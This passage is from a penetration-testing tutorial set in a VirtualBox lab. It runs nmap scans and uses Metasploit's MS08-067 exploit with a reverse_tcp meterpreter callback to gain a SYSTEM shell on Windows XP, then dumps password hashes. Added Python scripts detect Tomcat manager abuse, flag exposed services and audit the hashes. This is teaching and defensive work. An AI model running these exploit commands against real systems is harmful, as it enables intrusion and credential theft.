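192.168.56.20 - - [19/Jun/2013:09:05:13 +0300] "GET /cmd/cmd_shell.jsp?cmd=id HTTP/1.1" 200 217
"""

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Text-interface (/manager/deploy) and HTML-interface (/manager/html/upload) actions.
MANAGER_ACTION = re.compile(r"^/manager/(?:html/)?(deploy|undeploy|upload)$")
LOGIN_FAIL_THRESHOLD = 2  # deliberately low for the sample log; tune for production


def parse_access_log(text):
    """Return one dict per well-formed line (client, user, time, method, target, status, size)."""
    return [m.groupdict() for m in map(LOG_LINE.match, text.splitlines()) if m]


def detect_manager_activity(text):
    """Return (rule, client, detail) findings in log order."""
    findings = []
    failed_logins = defaultdict(int)
    deployed_contexts = set()  # context paths created through the manager
    for r in parse_access_log(text):
        url = urlsplit(r["target"])
        path, query = url.path, parse_qs(url.query)
        # Rule 1: repeated 401s on the manager app from one client.
        if path.startswith("/manager/") and r["status"] == "401":
            failed_logins[r["client"]] += 1
            if failed_logins[r["client"]] == LOGIN_FAIL_THRESHOLD:
                findings.append(("manager-login-failures", r["client"],
                                 f"{LOGIN_FAIL_THRESHOLD} failed manager logins"))
            continue
        # Rule 2: a successful deploy/undeploy/upload, recorded with the user who did it.
        action = MANAGER_ACTION.match(path)
        if action and r["status"] == "200":
            ctx = query.get("path", [None])[0]
            findings.append((f"manager-{action.group(1)}", r["client"],
                             f"user={r['user']} context={ctx or '(form upload)'}"))
            if action.group(1) == "deploy" and ctx:
                deployed_contexts.add(ctx)
            continue
        # Rule 3: any request into a context that this log shows being deployed.
        if any(path.startswith(ctx + "/") for ctx in deployed_contexts):
            findings.append(("request-to-manager-deployed-context", r["client"], path))
        # Rule 4: a JSP taking a cmd parameter, the pattern of the shell above.
        if path.endswith(".jsp") and "cmd" in query:
            findings.append(("jsp-cmd-parameter", r["client"], r["target"]))
    return findings


if __name__ == "__main__":
    for rule, client, detail in detect_manager_activity(ACCESS_LOG):
        print(f"{rule:40} {client:15} {detail}")
```

Rule 3 is the one that survives an attacker choosing a random context name, as the Metasploit module does: it keys on the deploy request the manager itself logged rather than on any name list.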

Gathering Information – Windows XP Machine

We'll begin as before with a basic scan against our Windows XP VM at 192.168.56.103.

[c]
root@wizard32:~# nmap -p- 192.168.56.103
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds
[/c]
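Both full port scans in this tutorial read the same way from the defender's side: every listener that is not needed from the network is a finding. The following Python script is an added example (not from the article) that parses nmap's normal output for both guests, using the port lines from the two scans above as constructed input, and flags the listeners an exposure policy forbids. The policy table and the hint for port 8180 are assumptions made for the example.

```python
"""Flag exposed services in nmap -p- output (added example; not from the article)."""
import re

# Constructed from the port lines the two scans above reported.
UBUNTU_SCAN = """\
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
"""

WINDOWS_SCAN = """\
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
"""

# Exposure policy (assumption for this example): services that should not be
# reachable from other hosts, with the reason a report would give.
NEVER_EXPOSE = {
    "telnet": "cleartext remote login",
    "ftp": "cleartext file transfer",
    "distccd": "remote compile daemon, unauthenticated by default",
    "mysql": "database should listen on localhost only",
    "postgresql": "database should listen on localhost only",
    "ajp13": "Tomcat AJP connector; bind to localhost",
    "msrpc": "Windows RPC endpoint mapper; firewall from untrusted networks",
    "microsoft-ds": "SMB; firewall from untrusted networks",
    "netbios-ssn": "NetBIOS session service; firewall from untrusted networks",
}
# Ports nmap labels "unknown" that deserve a closer look (assumption).
UNKNOWN_PORT_HINTS = {8180: "Tomcat HTTP connector; manager/admin apps may be exposed"}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Return (host, [(port, proto, state, service), ...]) from nmap's normal output."""
    host, ports = None, []
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return host, ports


def exposure_findings(text):
    """Return (host, port, service, reason) for every open port the policy forbids."""
    host, ports = parse_nmap(text)
    findings = []
    for port, proto, state, service in ports:
        if state != "open":
            continue
        if service in NEVER_EXPOSE:
            findings.append((host, port, service, NEVER_EXPOSE[service]))
        elif service == "unknown" and port in UNKNOWN_PORT_HINTS:
            findings.append((host, port, service, UNKNOWN_PORT_HINTS[port]))
    return findings


if __name__ == "__main__":
    for scan in (UBUNTU_SCAN, WINDOWS_SCAN):
        for host, port, service, reason in exposure_findings(scan):
            print(f"{host}:{port} ({service}): {reason}")
```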

Looking at the scan results, we can see several open ports. Let's focus on port 445. Using nmap once more, with a couple of extra parameters, we'll find out a little more about this specific port.

[c]
root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: windowsx-c7b000
| NetBIOS computer name: WINDOWSX-C7B000
| Workgroup: WORKGROUP
|_ System time: 2013-06-18 04:36:59 UTC+3
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.103
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
[/c]

The options used above:

  • -A: aggressive scan; enables several options at once, such as version and script scanning. Use with caution.
  • -T (0-5): timing template; determines how aggressive (fast) the scan is.
  • -Pn: skip host discovery, i.e. do not send a ping probe before scanning.
  • -p: only scan the specified ports.

Identify network services – Exploit Vulnerable Backdoors

Reviewing the scan output closely, we can see that port 445/tcp runs an SMB server. We can identify the OS the SMB server runs on by typing:

[c]
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run
[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, the SMB server runs on Windows XP SP2. So, once more using Metasploit, we'll try to exploit it.

[c]
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WINDOWSX-C7B000
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: WINDOWSX-C7B000
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 2 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: windowsxp
Registered Organization:
Product ID: 76487-640-8365391-23703
Original Install Date: 6/10/2013, 1:02:40 PM
System Up Time: 0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer: innotek GmbH
System Model: VirtualBox
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version: VBOX - 1
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use: 39 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
[01]: AMD PCNET Family PCI Ethernet Adapter
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.56.103
[/c]
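The hashdump output above is in pwdump format: `user:RID:LM-hash:NT-hash:::`. Two values in it are worth recognising on sight, because they are constants of the algorithms rather than anything specific to this machine: `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty string (it also appears when LM hashing is disabled or the password is longer than 14 characters), and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty string, meaning the account has a blank password. In the dump above, Administrator, Guest and windowsxp all carry the blank-password NT hash, and HelpAssistant, IUSR and IWAM still have LM hashes stored. The following Python script is an added example, not part of the original tutorial or of Metasploit; it parses a dump in this format and reports those two audit findings per account. The sample dump is constructed for the example (the non-sentinel hex values are made up) and the function names are the author's own.

```python
import re
from dataclasses import dataclass
from typing import List

# Hashes of the empty password. These are fixed outputs of the LM and NT
# algorithms, so they can be matched as literals without computing MD4/DES.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump-format line: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class AccountFinding:
    user: str
    rid: int
    blank_password: bool   # NT hash equals the empty-string NT hash
    lm_hash_stored: bool   # an LM hash other than the empty sentinel is present


def parse_pwdump_line(line: str) -> AccountFinding:
    """Parse a single pwdump line; hex case is normalised before comparison."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a pwdump line: {line!r}")
    lm = m["lm"].lower()
    nt = m["nt"].lower()
    return AccountFinding(
        user=m["user"],
        rid=int(m["rid"]),
        blank_password=(nt == EMPTY_NT),
        lm_hash_stored=(lm != EMPTY_LM),
    )


def audit_hashdump(dump: str) -> List[AccountFinding]:
    """Return one finding per non-empty line of a hashdump."""
    return [parse_pwdump_line(l) for l in dump.splitlines() if l.strip()]


def blank_password_accounts(dump: str) -> List[str]:
    """Accounts whose NT hash is the empty-string hash, i.e. no password set."""
    return [f.user for f in audit_hashdump(dump) if f.blank_password]


def lm_enabled_accounts(dump: str) -> List[str]:
    """Accounts that still store a real LM hash (LM hashing not disabled)."""
    return [f.user for f in audit_hashdump(dump) if f.lm_hash_stored]


# Constructed sample in the same format as the tutorial's hashdump output.
# Only the empty-string sentinels are real hash values; the rest is made-up hex.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1000:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
alice:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

if __name__ == "__main__":
    for f in audit_hashdump(SAMPLE_DUMP):
        flags = []
        if f.blank_password:
            flags.append("BLANK PASSWORD")
        if f.lm_hash_stored:
            flags.append("LM hash stored")
        print(f"{f.user:<16} rid={f.rid:<5} {', '.join(flags) or 'ok'}")
```

Run against the constructed sample, the script flags Administrator and Guest as having blank passwords and svc_backup as still storing an LM hash; fed the tutorial's own dump it would flag the accounts named above. A blank local Administrator password and LM hashes left enabled are both findings a report should call out independently of whatever service was used to reach the host.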

Conclusion

There are many ways to enumerate and exploit vulnerable web applications and services. This tutorial has covered the basic steps for gathering important information and exploiting some of the best-known vulnerable services in a couple of different ways. The safest approach is to test every parameter in a virtual environment first, and to run any of the above examples against real servers only with the administrator's authorization.

Posted: June 27, 2013
Article author: Fotis Liatsis

Fotis Liatsis is an undergraduate at the Technological Educational Institute of Larissa, department of Computer Science and Telecommunications. He is also a member and System/Network Administrator of the Greek Student Security Team - CampSec. Fotis is an OWASP member of the Greek Student Chapter, System Administrator of Hackademic and also a member of the Digital Awareness and Reinforcement of Trust (D.A.R.T. NGO) team. His interests include Ethical Hacking, Penetration Testing, Security/vulnerability research and applied Cryptography methods. He is a security enthusiast and Athcon fanatic. You can follow him on Twitter (@liatsisfotis) or read his blog (http://www.liatsisfotis.com/) for more information.

6 responses to “Exploitation Ubuntu – Windows Services”

  1. Consultuning says:

    Color me unimpressed. So you take as an example a service (Tomcat) that is not intended for production use and “find” a “vulnerability” consisting in using its well documented defaults.

    Really great, makes me think of “Ethical hacking training” as “this is the list of commands you have to run”, which avoids anyone reading any documentation, or actually knowing what they are doing. Or even why.

    I had seen in my feed lots of articles from this site lately but never bothered to read them. For once, I took the chance to read it this time and found it a complete waste of time.

    Please, find a non-trivial vulnerability and then explain which tools and techniques you’ve used to find it. Then we can see your services as little more than tutorials on using freely available packages and programs.

    Perhaps your organization is full of really great people that actually know what they are doing, but articles at this level are not going to create that impression.

  2. Constantin Ionel says:

    Really great! Thanks!

  3. wizard32 says:

    Consultuning, thanks for your comment. As I say, my tutorial describes the basic principles of gathering information: how to determine an open port using multiple tools (this tutorial describes the nmap and nikto tools). Also, the gathering of information is one of the most important parts of Penetration Testing. My tutorial shows how to exploit a Windows machine which runs a vulnerable SMB service. About Tomcat, there are a lot of machines which run old versions of this Apache server. I explain the way (two ways: metasploit, web service) of exploitation and a couple of simple commands to gather information about the victim machine, and it is not “this is the list of commands you have to run”, because I could describe more complicated commands like creating a user, giving root access to the specific user etc.

    P.S. My tutorials explain the basic steps to learn how to think when you want to gather info about a machine and how to penetrate it.

  4. null says:

    I wholeheartedly agree with the above poster. This is rudimentary stuff. Do something interesting, not something that's been done 1000 times and is even included in Metasploitable, the ridiculously vulnerable Linux OS made for beginners to the MSF framework. *yawn*

  5. kanishka says:

    Nice information for beginner like me.

  6. rootbrain says:

    Let's say that your tutorial is OK…

    Do you think that you know how to think? No… Absolute NO.

    This stuff is not even made for the first semesters of a CS student…
    Come on, you took something too common, tested it for yourself and then you wrote this??? (I am sure that you saw this on YouTube, there are a lot of videos out there).

    This is what you call Security/vulnerability research ??? or Ethical Hacking???

    All of your tutorials in your blog are a waste of time, find something really interesting ….
